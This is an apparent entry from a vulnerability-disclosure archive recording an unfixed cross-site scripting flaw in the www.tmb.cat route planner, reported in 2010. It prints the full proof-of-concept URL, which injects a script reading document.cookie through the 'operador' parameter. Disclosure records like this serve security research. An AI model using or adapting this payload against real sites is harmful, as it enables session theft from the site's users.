Security researcher vlan7, has submitted on 14/01/2010 a cross-site-scripting (XSS) vulnerability affecting www.tmb.cat, which at the time of submission ranked 49228 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/01/2010 |
Date published: 05/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: vlan7 |
Domain: www.tmb.cat |
Category: XSS |
Pagerank: 49228 |
URL: http://www.tmb.cat/vullanar/ca_ES/vullanarconfirmacio.jsp?operador=1%3E%22%3E%3Cscript%20%0d%0a%3Eal ert%28document.cookie%29%3B%3C/script%3E&poblacioonsoc1=0&onsoc1=1&carreronsoc1=111-222-1933email@ad dress.tst&numeroonsoc1=111-222-1933email@address.tst&poblacioonvullanar1=0&onvullanar1=1&carreronvul lanar1=111-222-1933email@address.tst&numeroonvullanar1=111-222-1933email@address.tst&ambcarreronsoc1 =111-222-1933email@address.tst&equipamentonsoc1=AEROPORT%20DE%20BARCELONA%201&poblacioonsoc2=0&tipus equipamentonsoc2=cinema&equipamentonsoc2=111-222-1933email@address.tst&equipamentonvullanar1=Casa%20 Mil%E0%2C%20La%20Pedrera&poblacioonvullanar2=0&tipusequipamentonvullanar2=cinema&tipustransport=0&nu mtransbords=0&tempscaminant=10&velocitatcaminant=0&tipushora=1&tipusrepre=0&dia=14&mes=01&hora=13&mi nut=36 |
Click here to view the mirror
|
|
|